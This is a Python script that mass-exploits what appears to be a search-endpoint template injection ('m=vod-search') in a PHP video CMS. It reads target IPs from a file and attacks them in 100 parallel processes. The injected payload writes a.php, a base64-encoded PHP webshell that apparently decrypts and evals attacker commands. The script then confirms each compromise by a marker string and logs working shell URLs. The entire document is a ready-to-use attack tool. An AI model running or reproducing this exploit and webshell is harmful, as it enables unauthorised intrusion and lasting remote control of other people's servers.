#!/usr/bin/env python3
# -*- coding:utf8 -*-

import requests
import multiprocessing
from threading import Lock

lock = Lock()

HEADERS = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
    "Accept-Language": "en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7",
    "Content-Type":"application/x-www-form-urlencoded ",
    }
exp = '''wd=union('''+"a"*5000+'''){if-A:print(fputs(fopen(base64_decode(YS5waHA),w),base64_decode(PD9waHAKCkBlcnJvcl9yZXBvcnRpbmcoMCk7CnNlc3Npb25fc3RhcnQoKTsKaWYgKGlzc2V0KCRfR0VUWydwYXNzJ10pKQp7CiAgICAka2V5PXN1YnN0cihtZDUodW5pcWlkKHJhbmQoKSkpLDE2KTsKICAgICRfU0VTU0lPTlsnayddPSRrZXk7CiAgICBwcmludCAka2V5Owp9CmVsc2UKewogICAgJGtleT0kX1NFU1NJT05bJ2snXTsKCSRwb3N0PWZpbGVfZ2V0X2NvbnRlbnRzKCJwaHA6Ly9pbnB1dCIpOwoJaWYoIWV4dGVuc2lvbl9sb2FkZWQoJ29wZW5zc2wnKSkKCXsKCQkkdD0iYmFzZTY0XyIuImRlY29kZSI7CgkJJHBvc3Q9JHQoJHBvc3QuIiIpOwoJCQoJCWZvcigkaT0wOyRpPHN0cmxlbigkcG9zdCk7JGkrKykgewogICAgCQkJICRwb3N0WyRpXSA9ICRwb3N0WyRpXV4ka2V5WyRpKzEmMTVdOyAKICAgIAkJCX0KCX0KCWVsc2UKCXsKCQkkcG9zdD1vcGVuc3NsX2RlY3J5cHQoJHBvc3QsICJBRVMxMjgiLCAka2V5KTsKCX0KICAgICRhcnI9ZXhwbG9kZSgnfCcsJHBvc3QpOwogICAgJGZ1bmM9JGFyclswXTsKICAgICRwYXJhbXM9JGFyclsxXTsKCWNsYXNzIEN7cHVibGljIGZ1bmN0aW9uIF9fY29uc3RydWN0KCRwKSB7ZXZhbCgkcC4iIik7fX0KCUBuZXcgQygkcGFyYW1zKTsKfQplY2hvIHdqYXNpZGpkc2E7)))}{endif-A}'''
def spider(url):
    shell = f"http://{url}/a.php"
    vulurl = f"http://{url}/index.php?m=vod-search"
    requests.post(vulurl, headers=HEADERS,data = exp,timeout=3, verify=False)
    resp = requests.get(shell, headers=HEADERS,allow_redirects = False,timeout=3, verify=False)
    if "wjasidjdsa" in resp.text:
        with lock:
            print(f'[+]Successed: {shell}')
        with open('success.txt','a',encoding='utf8') as sf:
            print(shell, file=sf)
    else:
        with lock:
            print(f'[+]Failed: {vulurl}')

def main():
    pool = multiprocessing.Pool(processes=100)
    with open('ip.txt','r') as ipfile:
        for ip in ipfile.readlines():
            pool.apply_async(spider,(ip.strip(),))
    pool.close()
    pool.join()

if __name__ == "__main__":
    main()